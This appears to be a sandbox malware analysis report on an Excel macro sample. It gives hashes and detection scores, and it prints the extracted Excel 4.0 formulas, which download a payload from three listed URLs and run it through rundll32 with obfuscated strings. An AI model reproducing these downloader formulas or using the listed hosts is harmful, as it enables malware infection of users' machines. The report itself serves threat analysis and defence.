General
-
Target
?i=1biefmipt
-
Size
83KB
-
Sample
220522-f58n8abbhk
-
MD5
9025de21ff8b4c4f735ed9dceff32cad
-
SHA1
56ea6fd825d8790562107b9a93576cd715d5d21a
-
SHA256
44b990e0cecfdbce9a3071b4b5a23cb9bfd7fbccb6fb5eb267b229a822c932b0
-
SHA512
8cbbb6f9bb1728ac132e66eabb9dc31ce6b2aba861868cdac844ad9c101672c667b2a00c920dd1254c0c945dc1595eb26953592482a0ae255f27192c3e8c2bfe
Behavioral task
behavioral1
Sample
?i=1biefmipt.xlsm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
?i=1biefmipt.xlsm
Resource
win10v2004-20220414-en
Malware Config
Extracted
http://recont.com/n8xbqb/lwEORjcJYPKCNQ/
http://dichnghiatienganh.com/jvmqawn/2mdbSTjM1Lg/
https://www.moharrampartners.com/requestion/wiA/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://recont.com/n8xbqb/lwEORjcJYPKCNQ/","..\erum.ocx",0,0)
=IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dichnghiatienganh.com/jvmqawn/2mdbSTjM1Lg/","..\erum.ocx",0,0))
=IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.moharrampartners.com/requestion/wiA/","..\erum.ocx",0,0))
=IF('EWDFFEFAD'!E22<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")
=RETURN()
Targets
Target
?i=1biefmipt
Score 10/10